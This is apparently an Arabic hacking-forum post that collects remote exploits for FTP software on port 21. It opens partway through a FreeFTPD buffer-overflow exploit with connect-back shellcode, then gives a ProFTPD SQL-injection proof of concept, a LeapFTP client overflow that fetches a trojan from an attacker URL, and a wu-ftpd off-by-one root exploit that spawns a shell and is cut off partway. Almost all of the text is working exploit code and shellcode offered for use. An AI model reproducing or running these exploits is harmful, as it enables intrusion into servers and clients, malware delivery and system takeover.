printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
printf("[i] Title: \tFreeFTPD Remote USER Buffer overflow\n");
printf("[i] Discovered by:\tbarabas [mutsonline]\n");
printf("[i] Exploit by: \tExpanders\n\n");
return 0;
}
int usage(char *filename) {
int i;
printf("Usage: \t%s <host> <port> <l_ip> <l_port> <targ>\n\n",filename);
printf(" \t<host> : Victim's host\n");
printf(" \t<port> : Victim's port :: Default: 21\n");
printf(" \t<l_ip> : Local ip address for connectback\n");
printf(" \t<l_port> : Local port for connectback\n");
printf(" \t<targ> : Target from the list below\n\n");
printf("# \t Platform\n");
printf("-----------------------------------------------\n");
for(i = 0; targets[i].platform; i++)
printf("%d \t %s\n",i,targets[i].platform);
printf("-----------------------------------------------\n");
exit(0);
}
int inject(char *port, char *ip)
{
unsigned long xorip;
unsigned short xorport;
xorip = inet_addr(ip)^(unsigned long)0x2D4AFDCF;
xorport = htons(atoi( port ))^(unsigned short)0x2D4A;
memcpy ( &shellcode[184], &xorip, 4);
memcpy ( &shellcode[190], &xorport, 2);
return 0;
}
int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[X] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[X] Socket failed!\n" );
exit ( 1 );
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[X] Failed connecting!\n" );
exit ( 1 );
}
return ( s );
}
int main(int argc, char *argv[]) {
int s,position;
unsigned int rcv;
char *buffer,*request;
char recvbuf[256];
banner();
if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
usage(argv[0]);
position = 0;
printf("[+] Creating evil buffer\n");
buffer = (char *) malloc(BUFFSIZE);
request = (char *) malloc(BUFFSIZE + strlen(BUGSTR)); // +3 == \r + \n + 0x00
memset(buffer,0x90,BUFFSIZE); // Fill with nops
inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode
position = 1007 - (strlen(shellcode) + 100); // 1007 : Pointer to next Execption structure 100: divide spaces
memcpy(buffer+position,shellcode,strlen(shellcode) );
position += strlen(shellcode)+100;
position += 2; // 2 bytes more nops
memcpy(buffer+position,jmpover,2);
position += 2;
memcpy(buffer+position,&targets[atoi(argv[5])].addr,4);
position += 4;
position += 8; // 8 bytes more nops
memcpy(buffer+position,jmpback,strlen(jmpback));
position += strlen(jmpback);
position += 8; // 8 bytes more nops
memset(buffer+position,0x00,1); // End
sprintf(request,BUGSTR,buffer);
printf("[+] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
rcv=recv(s,recvbuf,256,0);
if(rcv<0)
{
printf("\n[X] Error while recieving banner!\n");
close_exit();
}
if (strstr(recvbuf,"freeFTPd")!=0)
{
sleep(1);
printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer));
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
printf("[+] Done - Wait for shell on port %s\n",argv[4]);
} else
printf("[X] This server is not running freeFTPd\n");
close(s);
free(buffer);
buffer = NULL;
return 0;
}
// [2005-11-17]
########################################
هذاي 72 ثغرة للبورت 21 FTP
الان طرحنا بورت 21 و متبقي 113 بورت من 114
ارجو حفظ الحقوق للجيوش الهكر
تحياتي
########################################
السلام عليكم و رحمة الله و بركاته
أن شاء الله تكونو في افضل حال
أقدم لكم وأضع بين يديكم البورتات وثغراتها
وللمعلوميه الموضوع حصري على موقع جيوش الهكر
و المعلوميه الثانيه و هي الفماجئة :
عدد البورتات الي اطرحها لكم 114 بورت
يعني يا حبيبي تقدر تقول جميع البورتات ^_*
نقول بسم الله الرحمن الرحيم
نبداء بـ بورت 21
21 ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003
use IO::Socket;
if(@ARGC<2){
print "\nProof Of Concept Sql Inject on ProFTPD\n";
print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
exit(0);
};
$server = $ARGV[0];
$query = $ARGV[1];
$remote =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
or die "Can't connect. \n";
if(defined($line=<$remote>)){
print STDOUT $line;
}
# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...
if($query eq "1"){
print $remote "USER ')UNION
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash'
WHERE(''='\n";
};
if(defined($line=<$remote>)){
print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){ #logged in
print "[------- Sql Inject Able \n";
}else{
print "[------- Sql Inject Unable \n";
}
close $remote;
# [2003-06-19]
21 LeapFTP 2.7.x Remote Buffer Overflow Exploit
/*
,----------------------------------------------------
; LeapFTP remote buffer overflow exploit
; by drG4njubas \\ DWC Group
`----------------------------------------------------
,----------------------------------------------------
;This exploit works against LeapFTP 2.7.3.600
;running on windows 2000 SP3 russian edition.
;Technical details: When LeapFTP requests IP
;and port by using PASV command if pasv mode
;is enabled, it causes the buffer overflow on
;the stack area if server's reply for this
;PASV request has a long IP address:
;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1)
;And this buffer overflow can overwrite a
;Structured Exception Handler on the stack
;area with an arbitrary value by specifying
;the address data over 1057 bytes. If this
;reply contains 0x29 and 0x2E bytes, an
;exception occurs before Structured Exception
;Handler is overvritten and program continues
;it's normal work. Thanks a lot to RaiSe for
;his wonderful shellcode.
`----------------------------------------------------
*/
#include<winsock.h>
#include<stdio.h>
void main(int argc, char *argv[]){
printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,\n");
printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n");
printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n");
printf("; www.dwcgr0up.net ;\n");
printf("'''''''''''''''''''''''''''''''''''''''''''''''''' '\n");
if(argc < 3){
printf("USAGE : dwclft273.exe <port> <trojan url>\n");
printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\n");
return;
}
char exploit[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\xEB\x30\x5F\xFC\x8B\xF7\x80"
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\x F2\x8B\xE6\x33\xD2\xB2\x04\xC1"
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x 08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\x C1\xE0\x08\x89\x45\xF8\x8B\x40"
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\x F8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x 8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x 03\x57\x8B\xD7\x80\x7A\x03\x80"
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\x EB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x 7F\x10\x03\x7D\xF8\xC1\xE0\x02"
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\x D0\x89\x45\xF4\x8B\x40\x3C\x03"
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x 03\x45\xF4\x89\x45\xF0\xAD\x03"
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x 8B\x55\xEC\x8B\x75\xFC\x8D\x76"
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x 56\x51\xF3\xA6\x59\x5E\x74\x06"
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\x F3\x33\xC9\x66\x8B\x0E\xEB\x02"
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\x F4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x 8B\x55\xF4\x52\x8B\x45\xE4\xFC"
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x 74\x03\x43\xEB\xF9\x43\xE2\xE1"
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x 04\x8D\x5B\x0C\xFC\x53\x51\x53"
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\x AB\x38\x2B\x74\x03\x43\xEB\xF9"
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x 33\xD2\x52\x8B\x45\xD4\xFF\xD0"
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x 52\x53\x8B\x45\xC0\xFF\xD0\x8D"
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x 10\x52\x33\xD2\x52\x52\x8D\x7B"
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x 55\xA0\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\x D0\x8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\x D2\x52\x53\x8B\x45\xDC\xFF\xD0"
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x 8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x 90\x52\x53\x8B\x45\xCC\xFF\xD0"
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\x FF\x47\x65\x74\x4D\x6F\x64\x75"
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x 72\x6E\x65\x6C\x33\x32\x2d\x64"
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x 64\x72\x65\x73\x73\x08\x4C\x6F"
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x 6C\x63\x72\x65\x61\x74\x08\x5F"
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x 6C\x41\x6C\x6C\x6F\x63\x08\x5F"
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x 65\x63\x08\x45\x78\x69\x74\x50"
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x 65\x74\x2d\x64\x6C\x6C\x08\x49"
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x 08\x49\x6E\x74\x65\x72\x6E\x65"
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x 74\x65\x72\x6E\x65\x74\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x 6E\x65\x74\x43\x6C\x6F\x73\x65"
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x 73\x63\x2d\x65\x78\x65\x08\x68"
"\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x 93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x 93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x 93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x 93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x25\x49\xE1"
"\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x 83\xD5\xFE\xFF\xFF\xFE\x83\x25"
"\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\x FF\x03\x80\xAB\x31\xFF\xFF\xFF"
"\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\x FF\xFF\x03\x80\xAB\x34\xFF\xFF"
"\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\x FF\xFF\xFF\x03\x80\xAB\x37\xFF"
"\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x 39\xFF\xFF\xFF\x03\x80\xAB\x3A"
"\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\x AB\x3C\xFF\xFF\xFF\x03\x80\xAB"
"\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x 80\xAB\x3F\xFF\xFF\xFF\x03\x80"
"\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x 03\x80\xAB\x42\xFF\xFF\xFF\x03"
"\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\x FF\x03\x80\xAB\x45\xFF\xFF\xFF"
"\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\x FF\xFF\x03\x80\xAB\x48\xFF\xFF"
"\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\x FF\xFF\xFF\x03\x80\xAB\x4B\xFF"
"\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x 4D\xFF\xFF\xFF\x03\x80\xAB\x4E"
"\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\x AB\x50\xFF\xFF\xFF\x03\x80\xAB"
"\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x 80\xAB\x53\xFF\xFF\xFF\x03\x80"
"\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x 03\x80\xAB\x56\xFF\xFF\xFF\x03"
"\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\x FF\x03\x80\xAB\x59\xFF\xFF\xFF"
"\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\x FF\xFF\x03\x80\xAB\x5C\xFF\xFF"
"\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\x FF\xFF\xFF\x03\x80\xAB\x5F\xFF"
"\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x 61\xFF\xFF\xFF\x03\x80\xAB\x62"
"\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\x AB\x64\xFF\xFF\xFF\x03\x80\xAB"
"\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x 80\xAB\x67\xFF\xFF\xFF\x03\x80"
"\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x 03\x80\xAB\x6A\xFF\xFF\xFF\x03"
"\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\x FF\x03\x80\xAB\x6D\xFF\xFF\xFF"
"\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\x FF\xFF\x03\x80\xAB\x70\xFF\xFF"
"\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\x FF\xFF\xFF\x03\x80\xAB\x73\xFF"
"\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x 75\xFF\xFF\xFF\x03\x80\xAB\x76"
"\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\x AB\x78\xFF\xFF\xFF\x03\x80\xAB"
"\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x 80\xAB\x7B\xFF\xFF\xFF\x03\x80"
"\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x 03\x80\xAB\x7E\xFF\xFF\xFF\x03"
"\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x 6B\x81\x03\x80\x6B\x82\x03\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\xE9\x61\xF9\xFF\xFF";
char *url = argv[2];
if(strlen(url)>80){
printf("ERROR: trojan url is too long!\n");
return;
}
for(unsigned int i = 5; i < strlen(url); i++){
url[i]+=3;
exploit[839+i] = url[i];
}
exploit[839+i] = '\x0B';
exploit[839+i+1] = '\x04';
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);
SOCKET listen_Sock = socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN addr_Sock;
addr_Sock.sin_family = AF_INET;
addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
addr_Sock.sin_port = htons(atoi(argv[1]));
printf("Awaiting for connections...\n");
if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return;
if(listen(listen_Sock, 1))return;
SOCKET victim = accept(listen_Sock,NULL,NULL);
printf("Victim connected...\n");
char buffer[2048];
sprintf(buffer, "220 drG4njubas roxx da world...\r\n");
send(victim, buffer, strlen(buffer), NULL);
while(true){
if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR)return;
if(strncmp(buffer, "USER", 4)==0){
sprintf(buffer, "%s\r\n", "331 Password required for user.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASS", 4)==0){
sprintf(buffer, "%s\r\n", "230 User logged in.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "SYST", 4)==0){
sprintf(buffer, "%s\r\n", "215 Windows_NT version 5.0");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "REST", 4)==0){
sprintf(buffer, "%s\r\n", "350 Restarting at blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PWD", 3)==0){
sprintf(buffer, "%s\r\n", "257 Current directory was changed.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "TYPE", 4)==0){
sprintf(buffer, "%s\r\n", "200 Type set to blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASV", 4)==0){
printf("PASV command received, sending exploit...");
sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", exploit);
send(victim, buffer, strlen(buffer), NULL);
printf("finnished.\n");
break;
}
else{
printf("ERROR: Wrong client or pasv mode is not enabled.\n");
break;
}
}
closesocket(victim);
closesocket(listen_Sock);
WSACleanup();
}
# [2003-07-12]
21 wu-ftpd 2.6.2 off-by-one Remote Root Exploit
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
** exploit by "you dong-hun"(Xpl017Elz)
**
** Brute-Force function added.
**
*/
#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();
struct os
{
int num;
char *v_nm;
u_long sh_addr;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char shellcode_ffx2[]=
/* setuid/chroot-break/execve shellcode by Lam3rZ */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x 31\xdb\x43\x89"
"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\x c9\x8d\x5e\x01"
"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x 31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x 43\x02\x31\xc9"
"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\x c9\x75\xf3\x31"
"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x 0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x 89\x46\x0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\x c0\x31\xdb\xb0"
"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x 62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";
struct os plat[]=
{
/*
** I enjoy version up, will not share more. :-}
*/
{
0,"RedHat Linux 6.x Version wu-2.6.0(1) compile",0x0806a59c
},
{
1,"RedHat Linux 6.x Version wu-2.6.1(1) compile",0x0806aad8
},
{
2,"RedHat Linux 6.x Version wu-2.6.2(2) compile",0x0806aa60
},
{
0x82,NULL,0x0
},
{
0x8282,"Brute-Force mode",0x0806a082
}
};
void prcode_usage(char *f_nm)
{
int r_n=(NRL);
fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
fprintf(stdout," \t-h [hostname] : Target hostname & ip.\n");
fprintf(stdout," \t-u [userid] : User id.\n");
fprintf(stdout," \t-p [passwd] : User password.\n");
fprintf(stdout," \t-n [port num] : Target port number.\n");
fprintf(stdout," \t-s [shelladdr] : Shellcode address.\n");
fprintf(stdout," \t-b : Brute-Force mode.\n");
fprintf(stdout," \t-m [max num] : Brute-Force Count number.\n");
fprintf(stdout," \t-i : help information.\n");
fprintf(stdout," \t-t [target num] : Select target number.\n\n");
for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
{
fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
}
fprintf(stdout,"\n Example: %s -hlocalhost -ux82 -px82 -n21 -t0\n\n",f_nm);
exit(FAD);
}
u_long null_chk(u_long sh_addr)
{
if((sh_addr>>(NRL)&0xff)==(0x00))
{
return(sh_addr+=(SCS));
}
else return(sh_addr);
}
void ftpd_login(int sock,char *user,char *pass)
{
char send_recv[(GET_R)];
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(!strstr(send_recv,(FTP_CONN_SCS)))
{
fprintf(stdout," [-] ftpd connection failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," ftpd connection success.\n");
fprintf(stdout," [+] User id input.\n");
memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
send(sock,send_recv,strlen(send_recv),(NRL));
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(!strstr(send_recv,(FTP_USER_FAD)))
{
fprintf(stdout," [-] User id input failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," [+] User password input.\n");
memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
send(sock,send_recv,strlen(send_recv),(NRL));
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(strstr(send_recv,(FTP_LOGIN_FAD)))
{
fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
close(sock);
exit(FAD);
}
else if(strstr(send_recv,(FTP_LOGIN_SCS)))
{
fprintf(stdout," User %s logged in.\n",user);
}
else
{
fprintf(stdout," [-] ftpd handshake failure.\n\n");
close(sock);
exit(FAD);
}
return;
}
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);
for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
{
dir_nm[dr_n]=(gb_character);
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);
if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD command failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD command failed.\n\n");
exit(FAD);
}
return;
}
int send_shellcode(int sock,int type,char *dir_nm)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
